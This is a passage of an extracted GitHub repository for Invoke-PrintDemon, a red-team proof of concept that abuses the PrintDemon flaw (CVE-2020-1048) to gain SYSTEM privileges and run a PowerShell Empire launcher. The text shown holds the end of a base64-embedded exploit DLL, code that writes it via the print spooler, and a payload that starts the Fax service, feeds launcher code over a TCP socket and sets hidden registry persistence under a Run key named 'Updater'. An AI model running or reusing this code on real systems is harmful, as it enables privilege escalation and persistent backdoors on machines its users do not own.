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')
[IntPtr] $unmanaged = ([system.runtime.interopservices.marshal]::AllocHGlobal($pe.Length));
[system.runtime.interopservices.marshal]::Copy($PE, 0, $unmanaged, $PE.Length);
[Printer.RawPrinterHelper]::SendBytesToPrinter("PrintDemon", $unmanaged, $PE.Length);
$regcommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('sc.exe start Fax;$FTPServer = "localhost";$FTPPort = "9299";$tcpConnection = New-Object System.Net.Sockets.TcpClient($FTPServer, $FTPPort);$tcpStream = $tcpConnection.GetStream();$reader = New-Object System.IO.StreamReader($tcpStream);$writer = New-Object System.IO.StreamWriter($tcpStream);$writer.AutoFlush = $true;$commands = @( "DQA=",'''+ $LauncherCode + ''',"DQA=" );while ($tcpConnection.Connected){while ($tcpStream.DataAvailable){$reader.ReadLine()};if ($tcpConnection.Connected){For($i = 0; $i -lt 5; $i++){ForEach ($str in $commands){Start-Sleep -s 1;$command = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($str));$writer.WriteLine($command) | Out-Null;};};break;};};$reader.Close();$writer.Close();$tcpConnection.Close();'));
$RegPath = 'HKCU:Software\Microsoft\Windows\CurrentVersion\Debug';
$parts = $RegPath.split('\');$path = $RegPath.split("\")[0..($parts.count -2)] -join '\';
$name = $parts[-1];$null=Set-ItemProperty -Force -Path $path -Name $name -Value $regcommand;
$null=Set-ItemProperty -Force -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Updater -Value '"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKCU:Software\Microsoft\Windows\CurrentVersion Debug).Debug);powershell -Win Hidden -enc $x"';
}
================================================
FILE: README.md
================================================
# PrintDemon
This is an [PowerShell Empire](https://github.com/BC-SECURITY/Empire) launcher PoC using [PrintDemon](https://github.com/ionescu007/PrintDemon) and [Faxhell](https://github.com/ionescu007/faxhell). The module has the Faxhell DLL already embedded which leverages [CVE-2020-1048](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1048) for privilege escalation. The vulnerability allows an unprivileged user to gain system-level privileges and is based on @ionescu007 PoC.
__Note__: This is a proof of concept. We have encountered some issues with printing to C:\Windows\System32\Ualapi.dll on some machines. We have not yet isolated what is causing this. You can drop the dll directly into System32 to test the launcher if you encounter issues.
## Code Borrowed from
https://github.com/ionescu007/PrintDemon
https://github.com/ionescu007/faxhell
https://stackoverflow.com/questions/4442122/send-raw-zpl-to-zebra-printer-via-usb
https://stackoverflow.com/questions/29759854/how-to-connect-to-tcp-socket-with-powershell-to-send-and-receive-data
================================================
FILE: gitignore
================================================
venv/
gitextract_3zzsupzv/ ├── .github/ │ └── FUNDING.yml ├── Invoke-PrintDemon.ps1 ├── README.md └── gitignore
Condensed preview — 4 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (27K chars).
[
{
"path": ".github/FUNDING.yml",
"chars": 69,
"preview": "# These are supported funding model platforms\n\ngithub: [bc-security]\n"
},
{
"path": "Invoke-PrintDemon.ps1",
"chars": 25373,
"preview": "function Invoke-PrintDemon {\n<#\n .SYNOPSIS\n\n This is an Empire launcher PoC using PrintDemon, the CVE-2020-104"
},
{
"path": "README.md",
"chars": 1207,
"preview": "# PrintDemon\nThis is an [PowerShell Empire](https://github.com/BC-SECURITY/Empire) launcher PoC using [PrintDemon](https"
},
{
"path": "gitignore",
"chars": 6,
"preview": "venv/\n"
}
]
About this extraction
This page contains the full source code of the BC-SECURITY/Invoke-PrintDemon GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 4 files (26.0 KB), approximately 10.3k tokens. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.